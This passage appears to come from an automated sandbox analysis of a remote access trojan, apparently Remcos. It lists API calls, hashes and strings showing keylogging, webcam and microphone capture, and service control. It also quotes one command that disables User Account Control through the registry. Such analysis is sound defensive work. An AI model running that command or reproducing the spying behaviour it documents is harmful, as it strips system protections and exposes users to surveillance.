                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID:
                                      • API String ID: 493672254-0
                                      • Opcode ID: ac3f9efd1811d306b49f21dfb5580faca07145983ea51d553450fb2a47c741a6
                                      • Instruction ID: b5689bbd517f382e23ed0952ea1537a9c6dd1e670f22c340a9ef9b4a558c39ed
                                      • Opcode Fuzzy Hash: ac3f9efd1811d306b49f21dfb5580faca07145983ea51d553450fb2a47c741a6
                                      • Instruction Fuzzy Hash: EB014531586224BBD6110B389C4DFBA3B6CDF422B0F440785F926DB1C0DB60EA00E5E4
                                      Function 02B48215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                      • _free.LIBCMT ref: 02B4824C
                                      • _free.LIBCMT ref: 02B48274
                                      • SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                      • _abort.LIBCMT ref: 02B48293
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 2b0723e465d7ae2993aa8abe02c697d33169ced0abe3707eab5f42e97358be01
                                      • Instruction ID: e167da38e3cd004c5b9d57fccdd0a3816a2d4a99906a4f96b1ce4dacc99193b6
                                      • Opcode Fuzzy Hash: 2b0723e465d7ae2993aa8abe02c697d33169ced0abe3707eab5f42e97358be01
                                      • Instruction Fuzzy Hash: 81F0A436544F106BDB5232297CC4F6A261ADFC27A5F280A94FDA897280EF64CC45B5A0
                                      Function 02B1AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAB5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAC9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAD6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAE5
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAF7
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A623,00000000), ref: 02B1AAFA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 4287390d87fbf65560e8a287e1eb892f182c18881746004f130c7197d8f4a248
                                      • Instruction ID: 1e850cefa9ae33290f659bda536af2bc8cbb3bbe4cf8943b2524eb808de7a863
                                      • Opcode Fuzzy Hash: 4287390d87fbf65560e8a287e1eb892f182c18881746004f130c7197d8f4a248
                                      • Instruction Fuzzy Hash: EAF0C231991628ABD711AB24AC88FBF3B6CDF452A0F440455FD0987181DB649D5599E0
                                      Function 02B1ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABB9
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABCD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABDA
                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABFB
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A5A3,00000000), ref: 02B1ABFE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 96df8f9e74181d3bd6dadc42ff3f8ea4c28f4f2f476afd26a7f32a0089c07a99
                                      • Instruction ID: d7041ee82319839c37b420a2cd7e99264121fd8ec21e9d05533e96bd357e9451
                                      • Opcode Fuzzy Hash: 96df8f9e74181d3bd6dadc42ff3f8ea4c28f4f2f476afd26a7f32a0089c07a99
                                      • Instruction Fuzzy Hash: 4EF0C231981628ABD6116B249C89EBF3B6CDF453A0F440455FE099B140DB289D15D9F0
                                      Function 02B1AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC20
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC34
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC41
                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC50
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC62
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02B1A523,00000000), ref: 02B1AC65
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 3ec8045ebca5ddac424f4b74c8bf9d6876874c2c3c1210be5d5e8958badae321
                                      • Instruction ID: e329e5a69c751ab1ffd3d8fc15cdd3f97986d7a573193b3c298c6878b2d96024
                                      • Opcode Fuzzy Hash: 3ec8045ebca5ddac424f4b74c8bf9d6876874c2c3c1210be5d5e8958badae321
                                      • Instruction Fuzzy Hash: DAF0C231981628ABD612AB24AC88FBF3B6CDF456A1F440855FE099B140EB289D1599E4
                                      Function 02B1B68A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B1361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,02B750E4), ref: 02B1363D
                                        • Part of subcall function 02B1361B: RegQueryValueExW.ADVAPI32(?,02B0F313,00000000,00000000,?,00000400), ref: 02B1365C
                                        • Part of subcall function 02B1361B: RegCloseKey.ADVAPI32(?), ref: 02B13665
                                        • Part of subcall function 02B1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02B0DAAA,WinDir,00000000,00000000), ref: 02B1BFC8
                                      • _wcslen.LIBCMT ref: 02B1B763
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                      • API String ID: 37874593-4246244872
                                      • Opcode ID: fb8cd8bb6ddfa8830f78a13a16763e105701f5f31f45b67c1e7fc080d152561e
                                      • Instruction ID: ef3f23d10f6f81cb4c0fb25f3f81f47f6917f1e6e97e0ed433d6e00715bc2bb7
                                      • Opcode Fuzzy Hash: fb8cd8bb6ddfa8830f78a13a16763e105701f5f31f45b67c1e7fc080d152561e
                                      • Instruction Fuzzy Hash: 3021C562A001046BEB19BAB88CD9DBE7B6F9F44324F4404FEE416A72C1EE24DC084B60
                                      Function 02B0B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                      • wsprintfW.USER32 ref: 02B0B1F3
                                        • Part of subcall function 02B0A636: SetEvent.KERNEL32(?,?,00000000,02B0B20A,00000000), ref: 02B0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      • API String ID: 1497725170-248792730
                                      • Opcode ID: cd7419b9fecf12effd619f6837bc7aff019d035b126f41fb79fa8bf0cc926aa1
                                      • Instruction ID: a43ef9b8441728f49bf9acfeb94b14691f4db8b533745c1fa9bf59bced750e10
                                      • Opcode Fuzzy Hash: cd7419b9fecf12effd619f6837bc7aff019d035b126f41fb79fa8bf0cc926aa1
                                      • Instruction Fuzzy Hash: F0118472914118AAC71EBB98EC948FE7BBDEF08351B00419AF506560D0FF789A45CAA4
                                      Function 02B1D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 02B1D55B
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02B1D576
                                      • GetLastError.KERNEL32 ref: 02B1D580
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      • API String ID: 2877667751-2410386613
                                      • Opcode ID: 59aaa5b70945978aea6e05431e8e13c7538d6483fd28cad0a4eaddd89c488235
                                      • Instruction ID: 32b0236cc86f2bab085cef0c2786bc554ead6484175d13d44bddb494f72979ea
                                      • Opcode Fuzzy Hash: 59aaa5b70945978aea6e05431e8e13c7538d6483fd28cad0a4eaddd89c488235
                                      • Instruction Fuzzy Hash: B5010CB1D0021DAFDB11DFD5ECC4DEFBBBCFB04294B54056AF914A6240E77559058BA0
                                      Function 02B07755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02B0779B
                                      • CloseHandle.KERNEL32(?), ref: 02B077AA
                                      • CloseHandle.KERNEL32(?), ref: 02B077AF
                                      Strings
                                      • C:\Windows\System32\cmd.exe, xrefs: 02B07796
                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 02B07791
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      • API String ID: 2922976086-4183131282
                                      • Opcode ID: 47865f7143b1ee68a8c29aa7ab2f039db58aced89233f3d752653ac073a4fc0d
                                      • Instruction ID: cb2c710a9178d862ac919d41aea77753b781e87c09ea5bf6c6633bef248027f1
                                      • Opcode Fuzzy Hash: 47865f7143b1ee68a8c29aa7ab2f039db58aced89233f3d752653ac073a4fc0d
                                      • Instruction Fuzzy Hash: 09F06272D402AC76DB20AAD69C0DEDF7F7DEBC1B11F00045AF508A6040D6745014CAB0
                                      Function 02B4333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02B432EB,?,?,02B4328B,?), ref: 02B4335A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02B4336D
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,02B432EB,?,?,02B4328B,?), ref: 02B43390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 1048fc06701aa03f47b3ebddcb6f34dbe2292451625560ef76e1411b0307eb56
                                      • Instruction ID: 92b54960dbfe1a10536787f724ae6bc0cba604c558fb683d17239e3721d7a126
                                      • Opcode Fuzzy Hash: 1048fc06701aa03f47b3ebddcb6f34dbe2292451625560ef76e1411b0307eb56
                                      • Instruction Fuzzy Hash: 64F0A430E40619FBDF119F54D848B9EBFF5EF44755F1485D8F809A6150CF304950DA90
                                      Function 02B050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B05120
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B04E7A,00000001), ref: 02B0512C
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,02B04E7A,00000001), ref: 02B05137
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02B04E7A,00000001), ref: 02B05140
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: KeepAlive | Disabled
                                      • API String ID: 2993684571-305739064
                                      • Opcode ID: e4545a14859c8f86f30322e3209f61c5f26e8a54a7bb87091a1b0c4237e1279b
                                      • Instruction ID: ece5d89968a93da10d44681b46c95c84f075aec45dce15e12cd860d3103ad0b5
                                      • Opcode Fuzzy Hash: e4545a14859c8f86f30322e3209f61c5f26e8a54a7bb87091a1b0c4237e1279b
                                      • Instruction Fuzzy Hash: 17F09071944710AFEB223B748D4EA7A7F99AB06350F4009E9F882826A0DA655850CF92
                                      Function 02B1ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 02B1ADF2
                                      • PlaySoundW.WINMM(00000000,00000000), ref: 02B1AE00
                                      • Sleep.KERNEL32(00002710), ref: 02B1AE07
                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 02B1AE10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                      • String ID: Alarm triggered
                                      • API String ID: 614609389-2816303416
                                      • Opcode ID: fe0eebfd378d7fb8734bbf457ce645d3d8cbb1fad657308f59f53471a9854ba7
                                      • Instruction ID: 8dc2045aadd93702a6966343fa04eba0d25668465d19539d5456641b57d94528
                                      • Opcode Fuzzy Hash: fe0eebfd378d7fb8734bbf457ce645d3d8cbb1fad657308f59f53471a9854ba7
                                      • Instruction Fuzzy Hash: F2E01226E80260776621337A6D4FE7F3E29DBD2B5074504A9FA069B194DD4508158AF2
                                      Function 02B1CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,02B1CDED), ref: 02B1CD62
                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,02B1CDED), ref: 02B1CD6F
                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,02B1CDED), ref: 02B1CD7C
                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,02B1CDED), ref: 02B1CD8F
                                      Strings
                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 02B1CD82
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                      • API String ID: 3024135584-2418719853
                                      • Opcode ID: db2cad0838a6e7be77b49a0a575b95659dceeaa41af6d40114508eff91f8645b
                                      • Instruction ID: 7a11e98414fe9ca2d64750a7b4d4043f56337b6041a369c1bf5d28e2e0b03f4a
                                      • Opcode Fuzzy Hash: db2cad0838a6e7be77b49a0a575b95659dceeaa41af6d40114508eff91f8645b
                                      • Instruction Fuzzy Hash: 4DE04872D40324F7E3102BB5EC4DEAB7F7CE749652B100655FA12865C29E64549186F1
                                      Function 02B4139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db7e0fdb8ff02923619a49f4ad1922974aaa031d62a7933fc8ec86cc8384b9ce
                                      • Instruction ID: 84918d570582c6d8d88cd24cdf5bb9580641dffa25500c99cdd849d50024b303
                                      • Opcode Fuzzy Hash: db7e0fdb8ff02923619a49f4ad1922974aaa031d62a7933fc8ec86cc8384b9ce
                                      • Instruction Fuzzy Hash: 51719071D102169BCF21CF5DC8C4AFEBBB9EF45364F5842A5E81AA7181DF708981DBA0
                                      Function 02B04371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000,02B0D262), ref: 02B044C4
                                        • Part of subcall function 02B04607: __EH_prolog.LIBCMT ref: 02B0460C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                      • API String ID: 3469354165-3547787478
                                      • Opcode ID: 3372343914c5b86b08b23bb7713488f3313edba8e6bd58d30206123efa46e6a4
                                      • Instruction ID: 1945f900ddf9506f7cf0217885fbd469adae494bebe590a9d4144dfa8e4c619f
                                      • Opcode Fuzzy Hash: 3372343914c5b86b08b23bb7713488f3313edba8e6bd58d30206123efa46e6a4
                                      • Instruction Fuzzy Hash: 40510731A042105BDA2BFB78D8D8A6E3F67AF85780F4008D8ED16576D1EF309919CB92
                                      Function 02B44CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      • _free.LIBCMT ref: 02B44E06
                                      • _free.LIBCMT ref: 02B44E1D
                                      • _free.LIBCMT ref: 02B44E3C
                                      • _free.LIBCMT ref: 02B44E57
                                      • _free.LIBCMT ref: 02B44E6E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: e545d915b71f8574f77cfaad53f52bb1dc2e4c7adf371e227ec1bb77aebf0817
                                      • Instruction ID: ba676d4cb074b56c3712b60c0efb19d181899eb7f3d63fcb16cc7d32a49cbfe2
                                      • Opcode Fuzzy Hash: e545d915b71f8574f77cfaad53f52bb1dc2e4c7adf371e227ec1bb77aebf0817
                                      • Instruction Fuzzy Hash: 3851F272A40304AFDB25DF69C8C0B6B77F5EF49724B0446E9E819DB250EB31EA11DB80
                                      Function 02B0F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02B0DAAA,WinDir,00000000,00000000), ref: 02B1BFC8
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02B0F91B
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 02B0F93F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02B0F94E
                                      • CloseHandle.KERNEL32(00000000), ref: 02B0FB05
                                        • Part of subcall function 02B1BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,02B0F5F9,00000000,?,?,02B75338), ref: 02B1BFFA
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02B1C1F5
                                        • Part of subcall function 02B1C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02B1C208
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 02B0FAF6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 4269425633-0
                                      • Opcode ID: 8426449d91980dfa15b795ef4e836bf861fa5966dc48cb3a0ffed093638f1dd0
                                      • Instruction ID: 1a157bdf150cc8213977b2c20c9d9d82d77e88cec2fb7ed23026b2ab64d532ab
                                      • Opcode Fuzzy Hash: 8426449d91980dfa15b795ef4e836bf861fa5966dc48cb3a0ffed093638f1dd0
                                      • Instruction Fuzzy Hash: 5F4112315183409BD32AFB25D8D4AFFB7AAAF94340F50496DE48E861D0EF305A0ACF52
                                      Function 02B43DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 6380a95a6ed22eb612e3182bc8b0176625dc2c0299e214c6370fa8aae91d1b0e
                                      • Instruction ID: f58612ef92951ee71565df4f7366e468a5f06c3fb755842329fa30a8bfd94061
                                      • Opcode Fuzzy Hash: 6380a95a6ed22eb612e3182bc8b0176625dc2c0299e214c6370fa8aae91d1b0e
                                      • Instruction Fuzzy Hash: 9541D336A41200AFCB20DF78C8C0A5EB3F6EF89714F2585E9D515EB340DB31A901DB90
                                      Function 02B5112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,02B2DD01,?,?,?,00000001,00000000,?,00000001,02B2DD01,02B2DD01), ref: 02B51179
                                      • __alloca_probe_16.LIBCMT ref: 02B511B1
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,02B2DD01,?,?,?,00000001,00000000,?,00000001,02B2DD01,02B2DD01,?), ref: 02B51202
                                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,02B2DD01,02B2DD01,?,00000002,00000000), ref: 02B51214
                                      • __freea.LIBCMT ref: 02B5121D
                                        • Part of subcall function 02B46137: RtlAllocateHeap.NTDLL(00000000,02B3529C,?,?,02B38847,?,?,00000000,?,?,02B0DE62,02B3529C,?,?,?,?), ref: 02B46169
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                      • String ID:
                                      • API String ID: 313313983-0
                                      • Opcode ID: da8d2b404832404b63d83b097647cbb02678e0879c90aba55b5877398405bc1f
                                      • Instruction ID: 2ab17b0480fb7862cdd1a1471eafb9324bec1247d6ee417ba3e388fb7943301f
                                      • Opcode Fuzzy Hash: da8d2b404832404b63d83b097647cbb02678e0879c90aba55b5877398405bc1f
                                      • Instruction Fuzzy Hash: 2631B271A1022AABDF25DF69DC40FAE7BA5EB00314F0445A8EC08DB290E735D9A1CB90
                                      Function 02B01BE9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02B01BF9
                                      • waveInOpen.WINMM(02B72AC0,000000FF,02B72AA8,Function_00001D0B,00000000,00000000,00000024), ref: 02B01C8F
                                      • waveInPrepareHeader.WINMM(02B72A88,00000020), ref: 02B01CE3
                                      • waveInAddBuffer.WINMM(02B72A88,00000020), ref: 02B01CF2
                                      • waveInStart.WINMM ref: 02B01CFE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
